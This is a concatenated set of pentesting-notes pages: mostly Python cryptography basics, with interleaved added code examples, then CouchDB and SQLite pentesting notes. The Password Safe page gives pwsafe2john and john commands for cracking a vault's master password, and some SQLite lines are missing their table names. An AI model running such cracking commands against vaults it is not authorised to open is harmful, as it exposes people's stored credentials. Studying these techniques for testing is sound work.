8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[CyberChef](https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode(''))**
14 | - **[Vigenere Cipher Encoder/Decoder](https://www.dcode.fr/vigenere-cipher)**
15 | - **[Vigenere Solver](https://www.guballa.de/vigenere-solver)**
16 |
17 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/bit-wise-operation/_data.yml:
--------------------------------------------------------------------------------
1 | category2: bit-wise-operation
--------------------------------------------------------------------------------
/src/exploit/cryptography/bit-wise-operation/and-bitwise-operations.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: AND Bitwise Operations
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Basic
12 |
13 | We can do the **AND** operations using **`&`** operator.
14 |
15 | ```python
16 | 24 & 72
17 | 0x18 & 0x48
18 | # 8
19 |
20 | # Binary representation
21 | bin(24 & 72)
22 | # '0b1000'
23 | ```
24 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/bit-wise-operation/or-bitwise-operations.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: OR Bitwise Operations
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Basic
12 |
13 | Assume we want to **OR** the binary values **0100** and **1001**.
14 | 
15 | ```txt
16 | 0100
17 | # OR
18 | 1001
19 | 
20 | # Result: 1101
21 | ```
22 |
23 | We can do that using **`|`** operator in Python.
24 |
25 | ```python
26 | 0b0100 | 0b1001
27 | # 13 ('1101' in binary)
28 |
29 | 4 | 9
30 | # 13 ('1101' in binary)
31 |
32 | # Binary representation
33 | bin(0b0100 | 0b1001)
34 | # 0b1101
35 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/bit-wise-operation/shift-bitwise-operations.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Shift Bitwise Operations
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Basic
12 |
13 | ### Left Bit Shift
14 |
15 | Assume we want to left bit shift the binary **`0100`** as below.
16 |
17 | ```txt
18 | 0100 -> 1000
19 | ```
20 |
21 | We can achieve this using the **`<<`** operator in Python.
22 |
23 | ```python
24 | 0b100 << 1
25 | # 8 ('1000' in binary)
26 |
27 | 4 << 1
28 | # 8 ('1000' in binary)
29 |
30 | # Output as the binary representation
31 | bin(4 << 1)
32 | # 0b1000
33 | ```
34 |
35 | ### Right Bit Shift
36 |
37 | Assume we want to right bit shift the binary **`0100`** as below.
38 |
39 | ```txt
40 | 0100 -> 0010
41 | ```
42 |
43 | We can achieve this using the **`>>`** operator in Python.
44 |
45 | ```python
46 | 0b100 >> 1
47 | # 2 ('10' in binary)
48 |
49 | 4 >> 1
50 | # 2 ('10' in binary)
51 |
52 | bin(4 >> 1)
53 | # 0b10
54 | ```
55 |
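The AND, OR and shift pages above each show one operator in isolation. As an added example (not code from Exploit Notes), the following uses all three together to pack and inspect Unix-style permission bits: shifts place each 3-bit group, OR combines them, and AND with a mask extracts or tests a bit. The layout mirrors `chmod` mode bits; the constants and function names are this example's own.

```python
# Added example (not from Exploit Notes): AND, OR and shifts on permission bits.

READ, WRITE, EXEC = 0b100, 0b010, 0b001   # rwx within one 3-bit group
GROUP_MASK = 0b111


def pack_mode(owner: int, group: int, other: int) -> int:
    """Shift each 3-bit group into place and OR them together (0o755 etc.)."""
    for g in (owner, group, other):
        if not 0 <= g <= GROUP_MASK:
            raise ValueError("each group must fit in 3 bits")
    return (owner << 6) | (group << 3) | other


def unpack_mode(mode: int) -> tuple:
    """Shift a group down, then AND with a mask to drop the neighbours."""
    return ((mode >> 6) & GROUP_MASK, (mode >> 3) & GROUP_MASK, mode & GROUP_MASK)


def has_flag(bits: int, flag: int) -> bool:
    # AND isolates the flag bit; note the parentheses, since == binds
    # tighter than & in Python.
    return (bits & flag) == flag


def set_flag(bits: int, flag: int) -> int:
    return bits | flag


def clear_flag(bits: int, flag: int) -> int:
    # ~flag has every other bit set; AND keeps everything except the flag.
    return bits & ~flag & GROUP_MASK


def is_world_writable(mode: int) -> bool:
    # A common hardening check: the WRITE bit in the "other" group.
    _, _, other = unpack_mode(mode)
    return has_flag(other, WRITE)


def to_rwx(mode: int) -> str:
    text = ""
    for group in unpack_mode(mode):
        text += "r" if has_flag(group, READ) else "-"
        text += "w" if has_flag(group, WRITE) else "-"
        text += "x" if has_flag(group, EXEC) else "-"
    return text
```

`is_world_writable` is the kind of check a file-permission audit script performs: shift the group of interest down, mask it, and AND against the flag.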
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/_data.yml:
--------------------------------------------------------------------------------
1 | category2: conversion
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-bytes-to-hex-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Bytes to Hex in Python
3 | description: Converting bytes to hex is easily done by hex method in python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using **`hex`** method in Python, we can easily convert bytes to hex.
14 |
15 | ```python
16 | b'Hello World'.hex()
17 | # 48656c6c6f20576f726c64
18 |
19 | b'abcdef'.hex()
20 | # 616263646566
21 |
22 | b'\xe3\x81\xad\xe3\x81\x93'.hex()
23 | # e381ade38193
24 | ```
25 |
26 | By the way, for converting from string to bytes before converting bytes to hex, use **`encode`** method as below.
27 |
28 | ```python
29 | 'Hello World'.encode().hex()
30 | # 48656c6c6f20576f726c64
31 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-bytes-to-int-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Bytes to Int in Python
3 | description: Converting bytes to int is easily done by int.from_bytes method in python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | ### Big Endian
14 |
15 | To use big endian, specify **"big"** for the **byteorder** argument (**the second argument**) of the **int.from_bytes** method in Python.
16 |
17 | ```python
18 | int.from_bytes(b'hello', byteorder='big')
19 | # 448378203247
20 |
21 | int.from_bytes(b'\x00\x01', byteorder='big')
22 | # 1
23 | ```
24 |
25 | ### Little Endian
26 |
27 | To use little endian, specify **"little"** for the **byteorder** argument (**the second argument**) of the **int.from_bytes** method in Python.
28 |
29 | ```python
30 | int.from_bytes(b'hello', byteorder='little')
31 | # 478560413032
32 |
33 | int.from_bytes(b'\x00\x01', byteorder='little')
34 | # 256
35 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-bytes-to-string-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Bytes to String in Python
3 | description: We can decode bytes to string in Python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using the **`decode`** method in Python, we can easily convert **bytes** to a **string**.
14 | There are three ways to call **`decode`**, as below.
15 | 
16 | All of the results are **"Hello"**.
17 | 
18 | ```python
19 | import codecs  # required for codecs.decode
20 | 
21 | b'Hello'.decode('utf-8')
22 | 
23 | bytes.decode(b'Hello', 'utf-8')
24 | 
25 | codecs.decode(b'Hello', 'utf-8')
26 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-character-to-binary-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Character to Binary in Python
3 | description: We can convert a character to binary using the format method in Python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | ### Character -> N-bit
14 |
15 | Using **`format`** method, the given character is converted to bits.
16 |
17 | ```python
18 | char = 'a'
19 | format(ord(char), 'b')
20 | # 1100001
21 | ```
22 |
23 | ### Character -> 8-bit
24 |
25 | We can get an **8-bit** representation by using the format string **`{0:08b}`** with the **`format`** method.
26 | 
27 | ```python
28 | char = 'a'
29 | '{0:08b}'.format(ord(char))
30 | # 01100001
31 | ```
32 | 
33 | ### Character -> 16-bit
34 | 
35 | We can get a **16-bit** representation by using the format string **`{0:016b}`** with the **`format`** method.
36 | 
37 | ```python
38 | char = 'a'
39 | '{0:016b}'.format(ord(char))
40 | # 0000000001100001
41 | ```
42 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-character-to-unicode-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Character to Unicode in Python
3 | description: We can easily convert a character to Unicode using the ord method in Python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | We can use **`ord`** method in Python to convert a **character** to **Unicode**.
14 |
15 | ```python
16 | ord('a')
17 | # 97
18 | ```
19 |
20 | By the way, use **`chr`** method to convert **Unicode** to a **character**.
21 |
22 | ```python
23 | chr(97)
24 | # a
25 | ```
26 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-hex-to-bytes-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Hex to Bytes in Python
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-09-04
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using the **`bytes.fromhex`** method, we can convert a **hex string** to **bytes**.
14 |
15 | ```python
16 | hex_str = "48656c6c6f20576f726c64"
17 |
18 | bytes.fromhex(hex_str)
19 | # b'Hello World'
20 | ```
21 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-int-to-binary-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Int to Binary in Python
3 | description: Using the format method in Python, we can convert int to binary.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | ### Int -> N-bit
14 |
15 | Specify **'b'** in the **`format`** method in Python.
16 |
17 | ```python
18 | format(123, 'b')
19 |
20 | # 1111011
21 | ```
22 |
23 | ### Int -> 8-bit
24 |
25 | We can get an **8-bit** representation by using the format string **`{0:08b}`** with the **`format`** method.
26 | Alternatively, the **`zfill`** method can be used for this purpose.
27 | 
28 | ```python
29 | '{0:08b}'.format(123)
30 | format(123, 'b').zfill(8)
31 | 
32 | # 01111011
33 | ```
34 | 
35 | ### Int -> 16-bit
36 | 
37 | In the same way, we can get a **16-bit** representation with the format string **`{0:016b}`**, or with the **`zfill`** method.
38 | 
39 | ```python
40 | '{0:016b}'.format(123)
41 | format(123, 'b').zfill(16)
42 | 
43 | # 0000000001111011
44 | ```
45 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-int-to-bytes-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Int to Bytes in Python
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using the **`to_bytes`** built-in method in Python, we can convert int to bytes.
14 | In addition, we specify the length in bytes as the first argument of the **`to_bytes`** method.
15 |
16 | ### Big Endian
17 |
18 | By specifying **'big'** to the **`byteorder`** argument, the result is the **big endian** bytes order.
19 |
20 | ```python
21 | num = 1234
22 |
23 | num.to_bytes(2, byteorder='big')
24 | # b'\x04\xd2'
25 |
26 | num.to_bytes(3, byteorder='big')
27 | # b'\x00\x04\xd2'
28 |
29 | num.to_bytes(4, byteorder='big')
30 | # b'\x00\x00\x04\xd2'
31 | ```
32 |
33 | ### Little Endian
34 |
35 | By specifying **'little'** to the **`byteorder`** argument, the result is the **little endian** bytes order.
36 |
37 | ```python
38 | num = 1234
39 |
40 | num.to_bytes(2, byteorder='little')
41 | # b'\xd2\x04'
42 |
43 | num.to_bytes(3, byteorder='little')
44 | # b'\xd2\x04\x00'
45 |
46 | num.to_bytes(4, byteorder='little')
47 | # b'\xd2\x04\x00\x00'
48 | ```
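The "Convert Bytes to Int" and "Convert Int to Bytes" pages show the two directions separately. As an added example (not code from Exploit Notes), the following applies both to a small constructed record format: a 2-byte big-endian length, a 4-byte little-endian record ID, then the payload. The format, the `HEADER_LEN` constant and the function names are assumptions made up for this example; the point is that the byte order must match on both sides, and that a length field read from untrusted input is validated before it is used.

```python
# Added example (not from Exploit Notes): int.from_bytes / int.to_bytes on a
# constructed record: [2-byte BE length][4-byte LE record id][payload].

HEADER_LEN = 6


def build_record(record_id: int, payload: bytes) -> bytes:
    # to_bytes raises OverflowError if the value does not fit the given width,
    # which is the right failure mode for a fixed-size field.
    length = len(payload).to_bytes(2, byteorder="big")
    ident = record_id.to_bytes(4, byteorder="little")
    return length + ident + payload


def parse_record(data: bytes) -> tuple:
    """Return (record_id, payload). The declared length is checked against
    the data actually present so a hostile header cannot cause an over-read."""
    if len(data) < HEADER_LEN:
        raise ValueError("truncated header")
    length = int.from_bytes(data[0:2], byteorder="big")
    record_id = int.from_bytes(data[2:6], byteorder="little")
    if len(data) - HEADER_LEN < length:
        raise ValueError("declared length %d exceeds available %d bytes"
                         % (length, len(data) - HEADER_LEN))
    return record_id, data[HEADER_LEN:HEADER_LEN + length]


def fits_in(value: int, nbytes: int) -> bool:
    # True when value can be encoded in nbytes (unsigned).
    try:
        value.to_bytes(nbytes, byteorder="big")
        return True
    except OverflowError:
        return False


def swap_endianness(value: int, nbytes: int) -> int:
    # Reading big-endian bytes back as little-endian reverses the byte order,
    # which is why 1234 appears as 0x04d2 in one order and 0xd204 in the other.
    return int.from_bytes(value.to_bytes(nbytes, "big"), "little")
```

`parse_record` deliberately refuses a header whose length exceeds the buffer; slicing in Python would silently return a short payload, but in C the same mistake is an out-of-bounds read.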
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-int-to-hex-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Int to Hex in Python
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | We can convert int to hex using **`hex`** method in Python.
14 |
15 | ```python
16 | hex(123)
17 | # 0x7b
18 |
19 | hex(448378203247)
20 | # 0x68656c6c6f
21 | ```
22 |
23 | To remove the prefix **`0x`**, exclude the first two characters of the string with **`[2:]`**.
24 |
25 | ```python
26 | hex(123)[2:]
27 | # 7b
28 |
29 | hex(448378203247)[2:]
30 | # 68656c6c6f
31 | ```
32 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-string-to-binary-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert String to Binary in Python
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | For converting strings to binary, we need to convert each character to binary by first converting the character to Unicode.
14 | Then concatenate these binaries.
15 |
16 | ```python
17 | text = "Hello"
18 |
19 | bin_str = ""
20 | for c in text:
21 |     c_bin = bin(ord(c))[2:] # remove "0b" prefix
22 |     bin_str += c_bin.zfill(8) # padding to 8-bit for adjustment
23 |
24 | print(bin_str)
25 | # 0100100001100101011011000110110001101111
26 | ```
27 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-string-to-bytes-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert String to Bytes in Python
3 | description: We can encode strings to bytes using Python's built-in methods.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | We can use several ways to encode string to bytes in Python.
14 |
15 | The **string** class has an **`encode`** method to encode strings to bytes.
16 | The **bytes** constructor also converts a string to bytes.
17 |
18 | Also we can specify the format e.g. **`utf-8`**, **`shift_jis`** as argument.
19 |
20 | ```python
21 | # Using encode() method
22 | "Hello".encode('utf-8')
23 | "Hello".encode('shift_jis')
24 |
25 | # Using bytes() method
26 | bytes("Hello", 'utf-8')
27 | bytes("Hello", 'shift_jis')
28 |
29 | # Result: b'Hello'
30 | ```
31 |
32 | ### Decode Bytes to String
33 |
34 | By the way, we can decode bytes to string with **`decode`** method.
35 |
36 | ```python
37 | b"Hello".decode()
38 | # Hello
39 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-unicode-to-character-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Unicode to Character in Python
3 | description: We can easily convert Unicode to character using the chr method in Python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using **`chr`** method in Python, we can convert Unicode to a character as below.
14 |
15 | ```python
16 | chr(97)
17 | # a
18 |
19 | chr(98)
20 | # b
21 | ```
22 |
23 | By the way, use **`ord`** method to convert **character** to a **Unicode**.
24 |
25 | ```python
26 | ord('a')
27 | # 97
28 | ```
29 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/key-derivation-function/_data.yml:
--------------------------------------------------------------------------------
1 | category2: key-derivation-function
--------------------------------------------------------------------------------
/src/exploit/cryptography/key-derivation-function/scrypt.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Scrypt
3 | description: Scrypt is a password-based key derivation function.
4 | tags:
5 | - Cryptography
6 | - Key Derivation Function
7 | refs:
8 | - https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#scrypt
9 | date: 2023-08-06
10 | draft: false
11 | ---
12 |
13 | ## Using Scrypt in Python
14 |
15 | We can use scrypt easily thanks to PyCryptodome.
16 | We need to install it first.
17 | 
18 | ```sh
19 | pip install pycryptodome
20 | ```
21 |
22 | Below is a Python script to derive a key from a password with scrypt.
23 |
24 | ```python
25 | from Crypto.Protocol.KDF import scrypt
26 | from Crypto.Random import get_random_bytes
27 |
28 | password = b'secret'
29 | salt = get_random_bytes(16)
30 | key = scrypt(password, salt, 16, N=2**14, r=8, p=1)
31 | print(f"key: {key.hex()}")
32 | ```
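The script above derives a key but does not show how the salt is kept or how a password is later checked. As an added example (not code from Exploit Notes or PyCryptodome), the following does the full round trip with the standard-library `hashlib.scrypt` (a swapped-in equivalent of `Crypto.Protocol.KDF.scrypt`, same N/r/p parameters): derive, store salt and parameters beside the key, and verify with a constant-time comparison. The `scrypt$N$r$p$salt$key` record layout and the function names are assumptions of this example.

```python
import hashlib
import hmac
import os

# Added example (not from Exploit Notes): scrypt as a password hash with
# hashlib.scrypt, plus a verifier. The record layout is this example's own.

N, R, P, DKLEN = 2 ** 14, 8, 1, 32   # same cost parameters as the page's script


def hash_password(password: str, salt: bytes = None) -> str:
    # A fresh random salt per password; the explicit salt parameter exists
    # only so the result can be reproduced in tests.
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=N, r=R, p=P, dklen=DKLEN)
    return "$".join(["scrypt", str(N), str(R), str(P), salt.hex(), key.hex()])


def verify_password(password: str, stored: str) -> bool:
    try:
        algo, n, r, p, salt_hex, key_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    expected = bytes.fromhex(key_hex)
    # The parameters travel with the hash, so the cost can be raised for new
    # records later without invalidating old ones.
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         n=int(n), r=int(r), p=int(p), dklen=len(expected))
    # compare_digest avoids leaking the position of the first mismatch.
    return hmac.compare_digest(key, expected)
```

With N=2**14 and r=8 each derivation uses 128*N*r = 16 MiB of memory, which is what makes scrypt expensive to attack on GPUs and ASICs; that memory cost, not the key length, is the security parameter to tune.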
33 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/math/_data.yml:
--------------------------------------------------------------------------------
1 | category2: math
--------------------------------------------------------------------------------
/src/exploit/cryptography/math/exponential.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Exponentiation
3 | description:
4 | tags:
5 | - Cryptography
6 | - Math
7 | refs:
8 | - https://en.wikipedia.org/wiki/Exponentiation
9 | date: 2023-09-07
10 | draft: false
11 | ---
12 |
13 | ## Basic
14 |
15 | We can calculate the exponentiation using **'\*\*'** operator in Python.
16 |
17 | ```python
18 | 2 ** 4
19 | # 16
20 |
21 | 6 ** 8
22 | # 1679616
23 | ```
24 |
25 |
26 |
27 | ## Using Pow Method in Python
28 |
29 | The **`pow`** method can be used for the exponentiation.
30 |
31 | ```python
32 | pow(2, 4)
33 | # 2 ** 4 = 16
34 | ```
35 |
36 | ### Modular Exponentiation
37 |
38 | In addition, by passing a third argument we can find the remainder of dividing a raised value by a specific number (modular exponentiation).
39 | This is sometimes used to find the secret key in **key derivation functions**, etc.
40 |
41 | ```python
42 | pow(2, 4, 6)
43 | # 2 ** 4 % 6 = 4
44 | ```
45 |
46 |
47 |
48 | ## Inverse
49 |
50 | ```python
51 | from Crypto.Util.number import inverse
52 |
53 | inverse(3, 10) # 7
54 | pow(3, -1, 10) # 7
55 | ```
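The "Modular Exponentiation" and "Inverse" sections above rely on `pow(a, e, m)` and `pow(a, -1, m)`. As an added example (not code from Exploit Notes or PyCryptodome), the following implements what those calls do internally: square-and-multiply exponentiation and the modular inverse via the extended Euclidean algorithm, including the case where no inverse exists. Function names are this example's own.

```python
# Added example (not from Exploit Notes): modular exponentiation by
# square-and-multiply and modular inverse by the extended Euclidean algorithm.


def mod_pow(base: int, exp: int, mod: int) -> int:
    """Right-to-left binary exponentiation: O(log exp) multiplications, and the
    intermediate values never exceed mod**2 (no huge integers are built)."""
    if mod <= 0 or exp < 0:
        raise ValueError("mod must be positive and exp non-negative")
    result = 1 % mod
    base %= mod
    while exp:
        if exp & 1:              # current low bit set: multiply it in
            result = result * base % mod
        base = base * base % mod  # square for the next bit
        exp >>= 1
    return result


def egcd(a: int, b: int) -> tuple:
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def mod_inverse(a: int, m: int) -> int:
    """The inverse exists only when gcd(a, m) == 1; pow(a, -1, m) raises
    ValueError in the same case."""
    g, x, _ = egcd(a % m, m)
    if g != 1:
        raise ValueError("%d has no inverse modulo %d (gcd=%d)" % (a, m, g))
    return x % m
```

The RSA private exponent is exactly `mod_inverse(e, phi)`; for the textbook values e = 17, phi = 3120 it gives d = 2753.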
--------------------------------------------------------------------------------
/src/exploit/cryptography/math/modular-congruence.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Modular Congruence
3 | description:
4 | tags:
5 | - Cryptography
6 | - Math
7 | - Modular Arithmetic
8 | refs:
9 | - https://cryptohack.org/courses/modular/ma0/
10 | date: 2023-09-02
11 | draft: false
12 | ---
13 |
14 | ## Basic
15 |
16 | In modular congruence, the following rules apply:
17 |
18 | ```txt
19 | If `a ≡ b mod c`, then `b ≡ a mod c`
20 | ```
21 |
22 | So if we have the following problem,
23 |
24 | ```txt
25 | 39 ≡ x mod 8
26 | ```
27 |
28 | To find **`x`** value, we can calculate it as below using Python.
29 |
30 | ```python
31 | x = 39 % 8
32 | print(x)
33 | ```
34 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/math/quadratic-residue.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Quadratic Residue
3 | description:
4 | tags:
5 | - Cryptography
6 | - Math
7 | - Modular Arithmetic
8 | refs:
9 | - https://cryptohack.org/courses/modular/root1/
10 | date: 2023-09-02
11 | draft: false
12 | ---
13 |
14 | ## Basic
15 |
16 | An integer **`x`** is called a quadratic residue modulo **`p`** if there is an integer **`a`** such that:
17 | 
18 | ```txt
19 | a**2 ≡ x mod p
20 | ```
21 |
22 | ### Brute Force
23 |
24 | To calculate a quadratic residue, the following Python script is an example for that.
25 |
26 | ```python
27 | p = 71
28 |
29 | for a in range(p):
30 |     qr = pow(a, 2, p)
31 |     print(f"a={a} : qr={qr}")
32 | ```
33 |
34 | ### Legendre Symbol
35 |
36 | According to Legendre Symbol, the following rules hold:
37 |
38 | ```txt
39 | # `a` is a quadratic residue and `a != 0 mod p`
40 | a**((p-1)/2) mod p == 1
41 | 
42 | # `a` is a quadratic non-residue mod p
43 | a**((p-1)/2) mod p == -1
44 | 
45 | # `a ≡ 0 mod p`
46 | a**((p-1)/2) mod p == 0
47 | ```
48 |
49 | We can check if an integer is a quadratic residue or not referring to the above.
50 |
51 | ```python
52 | print(pow(a, (p-1)//2, p) == 1)  # `a` and `p` as defined above
53 | # If True, `a` is a quadratic residue (a non-residue gives p-1 here, since Python returns the remainder in 0..p-1).
54 | ```
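The Legendre check above tells whether a square root exists but not what it is. As an added example (not code from Exploit Notes or CryptoHack), the following implements the Legendre symbol via Euler's criterion, builds the residue set the brute-force loop prints, and computes the actual modular square root for primes p ≡ 3 (mod 4), which includes the page's p = 71. Function names are this example's own.

```python
# Added example (not from Exploit Notes): Legendre symbol, residue set, and a
# modular square root for p ≡ 3 (mod 4).


def legendre(a: int, p: int) -> int:
    """1 if a is a quadratic residue mod p, -1 if a non-residue, 0 if p | a."""
    r = pow(a, (p - 1) // 2, p)
    return -1 if r == p - 1 else r


def quadratic_residues(p: int) -> list:
    # Brute force, as in the page's loop, collected as distinct values;
    # for an odd prime there are exactly (p-1)/2 non-zero residues.
    return sorted({pow(a, 2, p) for a in range(1, p)})


def mod_sqrt_3mod4(a: int, p: int):
    """For p ≡ 3 (mod 4) the roots of x**2 ≡ a are ±a**((p+1)/4).
    Returns the two roots, or None when a is not a residue: in that case the
    formula yields a value whose square is -a, not a, which is why the
    Legendre check must come first."""
    if p % 4 != 3:
        raise ValueError("shortcut needs p ≡ 3 (mod 4); use Tonelli-Shanks otherwise")
    a %= p
    if a == 0:
        return (0, 0)
    if legendre(a, p) != 1:
        return None
    r = pow(a, (p + 1) // 4, p)
    return tuple(sorted((r, p - r)))
```

Every non-zero residue modulo a prime has exactly two roots, r and p - r; the test checks that property rather than a memorised value.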
55 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/tool/_data.yml:
--------------------------------------------------------------------------------
1 | category2: tool
--------------------------------------------------------------------------------
/src/exploit/cryptography/tool/password-safe-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Password Safe Pentesting
3 | description: Password Safe is a password database utility. We may retrieve passwords for users.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2025-03-13
8 | draft: false
9 | ---
10 |
11 | ## Install PasswordSafe Manager
12 |
13 | Go to the [release page](https://github.com/pwsafe/pwsafe/releases) and download it.
14 |
15 | For example, if you use Debian, download `.deb` package and run the following command:
16 |
17 | ```bash
18 | sudo dpkg -i passwordsafe-debian12-x.x-amd64.deb
19 | ```
20 |
21 | ## Analyze `.pwsafe3` file
22 |
23 | ```bash
24 | pwsafe example.pwsafe3
25 | ```
26 |
27 | ## Crack `.pwsafe` Password
28 |
29 | If a password is required to open the `.pwsafe` file in the PasswordSafe manager, we might be able to crack the password of the `.pwsafe` file as below:
30 |
31 | ```bash
32 | pwsafe2john example.pwsafe3 > hash.txt
33 | john --wordlist=wordlist.txt hash.txt
34 | ```
35 |
--------------------------------------------------------------------------------
/src/exploit/database/_data.yml:
--------------------------------------------------------------------------------
1 | category1: database
2 | related_menus:
3 | - title: Database
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/database/couchdb-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: CouchDB Pentesting
3 | description: Apache CouchDB is a document-oriented NoSQL database. Default ports are 5984, 6984.
4 | tags:
5 | - Database
6 | refs:
7 | - https://guide.couchdb.org/draft/tour.html
8 | date: 2022-12-28
9 | draft: false
10 | ---
11 |
12 | ## Directories
13 |
14 | ```sh
15 | # List all databases
16 | /_all_dbs
17 |
18 | # Show information of the database
19 | /
20 |
21 | # Futon administration interface
22 | /_utils/
23 | # Temporary View
24 | /_utils/database.html?/_temp_view
25 | ```
26 |
27 |
28 |
29 | ## Basic Operations
30 |
31 | ```sh
32 | # Create a new database
33 | curl -X PUT https://example.com:5984/
34 |
35 | # Delete a database
36 | curl -X DELETE https://example.com:5984/
37 | ```
--------------------------------------------------------------------------------
/src/exploit/database/sqlite-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: SQLite Pentesting
3 | description: SQLite is a database engine.
4 | tags:
5 | - Database
6 | refs:
7 | date: 2024-10-03
8 | draft: false
9 | ---
10 |
11 | ## Interpreter
12 |
13 | ```sh
14 | sqlite3 sample.db
15 | sqlite3 sample.sqlite
16 | sqlitebrowser sample.db
17 | ```
18 |
19 |
20 |
21 | ## Commands
22 |
23 | ```sh
24 | # Help
25 | sqlite> .help
26 |
27 | # Show databases
28 | sqlite> .databases
29 |
30 | # Show tables
31 | sqlite> .tables
32 |
33 | # Show table information
34 | sqlite> PRAGMA table_info(table_name);
35 |
36 | # Dump contents of tables
37 | sqlite> .dump
38 |
39 | # SQL commands to display values in the table
40 | sqlite> SELECT * FROM
;
41 | # Display values in Hex
42 | sqlite> SELECT HEX(column_name) FROM
;
43 |
44 | # Exit the interpreter
45 | sqlite> .quit
46 | ```
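The shell commands above can be reproduced from Python's built-in `sqlite3` module, which is convenient when a database has to be inspected in a script rather than interactively. The following added example (not code from Exploit Notes) does the `.tables`, `PRAGMA table_info`, `SELECT` and `HEX()` steps against a small constructed in-memory database. Table and column names cannot be bound as query parameters, so they are quoted as identifiers to keep a caller-supplied name from becoming an injection point. The sample schema and all function names are assumptions of this example.

```python
import sqlite3

# Added example (not from Exploit Notes): sqlite3 shell steps from Python
# against a constructed in-memory database.


def quote_ident(name: str) -> str:
    # Double-quote an SQL identifier, escaping embedded double quotes; this is
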